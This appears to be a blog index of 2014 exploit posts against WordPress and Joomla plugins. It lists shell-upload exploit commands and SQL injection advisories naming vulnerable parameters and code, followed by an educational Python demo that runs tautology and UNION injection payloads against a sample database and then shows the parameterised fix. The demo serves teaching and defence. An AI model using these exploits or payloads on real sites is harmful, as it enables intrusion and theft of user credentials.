WordPress and Joomla Creative Contact Form Unauthenticated Shell Upload Vulnerability

claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http://127.0.0.1/wordpress -f shell.php -c wordpress
[ASCII art banner printed by the script] ....

October 23, 2014 · 2 min · claudio

WordPress CP Multi View Event Calendar 1.01 SQL Injection

######################
# Exploit Title : WordPress CP Multi View Event Calendar 1.01 SQL Injection Vulnerability
# Exploit Author : Claudio Viviani
# Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip
# Date : 2014-10-23
# Tested on : Windows 7 / Mozilla Firefox
#             Windows 7 / sqlmap (0.8-1)
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
CP Multi View Event Calendar 1.01 suffers from an SQL injection vulnerability: the calid variable is not sanitized....

October 22, 2014 · 1 min · claudio

WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit + Demo

[claudio@localhost ~]$ python wp_gallery_slideshow_146_suv.py -t http://localhost/wordpress -u editor -p editor -f sh33l.php
[ASCII art banner printed by the script]
W0rdpr3ss Sl1d3sh04w G4ll3ry 1....

September 16, 2014 · 3 min · claudio

WordPress Spider Facebook 1.0.8 Authenticated SQL Injection

######################
# Exploit Title : WordPress Spider Facebook 1.0.8 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
######################
# Vulnerable code :
function Spider_Facebook_manage() {
    require_once("facebook_manager.php");
    require_once("facbook_manager.html.php");
    if(!function_exists ('print_html_nav' ))
        require_once("nav_function/nav_html_func....

September 5, 2014 · 1 min · claudio

WordPress Huge-IT Image Gallery 1.0.1 SQL Injection

######################
# Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://huge-it.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip (Fixed)
#   Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
######################
# Vulnerable code :
function editgallery($id) {
    global $wpdb;
    if(isset($_GET["removeslide"])){
        if($_GET["removeslide"] !...

September 1, 2014 · 1 min · claudio
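The calid parameter in the CP Multi View Event Calendar advisory and the removeslide parameter read from $_GET in the Huge-IT excerpt are the same bug class: a request value that should be an integer ID is dropped into a $wpdb query as text, so an injected tautology or UNION rewrites the statement. The script below is an added illustration and not code from any of these posts or plugins; it uses Python and an in-memory SQLite database with a constructed events table, a constructed users table and two constructed sqlmap-style payloads, and shows what those payloads do against the unparameterised query and how an integer check plus parameter binding stops them.

```python
import sqlite3

# Constructed sample data: a stand-in for a plugin's calendar/gallery table plus
# the users table an attacker would pivot to. Not data from any real site.
SAMPLE_EVENTS = [(1, "Launch", 101), (2, "Board meeting", 102), (3, "Private event", 103)]
SAMPLE_USERS = [(1, "admin", "$P$Bfake.hash.for.demo.only")]


def make_db():
    """Build an in-memory SQLite database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT, owner INTEGER)")
    conn.executemany("INSERT INTO events VALUES (?, ?, ?)", SAMPLE_EVENTS)
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def fetch_event_vulnerable(conn, calid):
    """The bug class in the advisories: the request parameter ('calid' here, a str
    exactly as it arrives in the query string) is pasted into the SQL text."""
    sql = "SELECT id, title FROM events WHERE id = " + calid
    return conn.execute(sql).fetchall()


def fetch_event_fixed(conn, calid):
    """Hardened form: the parameter must parse as a positive integer, and it is
    bound as a query parameter rather than concatenated, so its content can
    never change the structure of the statement."""
    try:
        cal_id = int(calid)
    except (TypeError, ValueError):
        raise ValueError("calid must be an integer") from None
    if cal_id < 1:
        raise ValueError("calid must be positive")
    return conn.execute("SELECT id, title FROM events WHERE id = ?", (cal_id,)).fetchall()


# Two constructed payloads of the kind sqlmap sends for an integer parameter:
# a tautology that returns every row, and a UNION that pulls rows from another table.
TAUTOLOGY = "1 OR 1=1"
UNION_DUMP = "0 UNION SELECT id, user_login || ':' || user_pass FROM users"


def demo():
    """Run both query styles against the sample database and collect the outcomes."""
    conn = make_db()
    results = {
        "vuln_normal": fetch_event_vulnerable(conn, "1"),
        "vuln_tautology": fetch_event_vulnerable(conn, TAUTOLOGY),   # every event leaks
        "vuln_union": fetch_event_vulnerable(conn, UNION_DUMP),      # password hash leaks
        "fixed_normal": fetch_event_fixed(conn, "1"),
    }
    for name, payload in (("fixed_tautology", TAUTOLOGY), ("fixed_union", UNION_DUMP)):
        try:
            fetch_event_fixed(conn, payload)
            results[name] = "accepted"  # would mean the hardening is broken
        except ValueError as exc:
            results[name] = "rejected: " + str(exc)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16s} {value}")
```

In a WordPress plugin the equivalent of fetch_event_fixed is `$wpdb->prepare( "... WHERE id = %d", absint( $_GET['calid'] ) )`. For the two authenticated cases, where the injection points sit in admin-side handlers, a `current_user_can()` capability check and a nonce on the action are the second layer; they do not replace the prepared statement, but they keep a low-privilege account from reaching the sink in the first place.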